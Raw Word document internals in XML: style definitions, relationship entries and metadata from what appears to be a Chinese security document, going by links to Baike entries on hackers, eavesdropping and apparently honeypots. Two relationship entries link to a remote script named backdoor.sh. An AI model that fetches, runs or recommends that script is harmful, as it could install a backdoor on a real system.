      <w:rFonts w:ascii="宋体" w:hAnsi="Courier New"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Chare">
    <w:name w:val="纯文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aff6"/>
    <w:rsid w:val="00C55A9C"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f4">
    <w:name w:val="列出段落1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C55A9C"/>
    <w:pPr>
      <w:widowControl/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff7">
    <w:name w:val="表格"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00C55A9C"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="_Style 1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C55A9C"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style13">
    <w:name w:val="_Style 13"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C55A9C"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style2">
    <w:name w:val="_Style 2"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C55A9C"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="1f5">
    <w:name w:val="Plain Table 1"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="41"/>
    <w:rsid w:val="003826B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s://baike.baidu.com/item/%E9%BB%91%E5%AE%A2/118396" TargetMode="External"/><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5.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.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7.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baike.baidu.com/item/%E7%AA%83%E5%90%AC/1624599" TargetMode="External"/><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hyperlink" Target="https://baike.baidu.com/item/Deepin" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.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6.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0.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hyperlink" Target="https://baike.baidu.com/item/Deepin" TargetMode="Externa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hyperlink" Target="http://www.8lab.cn/backdoor.sh" TargetMode="External"/><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0.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hyperlink" Target="https://baike.baidu.com/item/%E8%9C%9C/79956" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.8lab.cn/backdoor.sh" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><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109.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10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A56310-AACB-4CCF-913D-4F3FE04B1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98</Pages>
  <Words>4540</Words>
  <Characters>25881</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>215</Lines>
  <Paragraphs>60</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>30361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Windows 用户</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-01T02:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-01T02:44:00Z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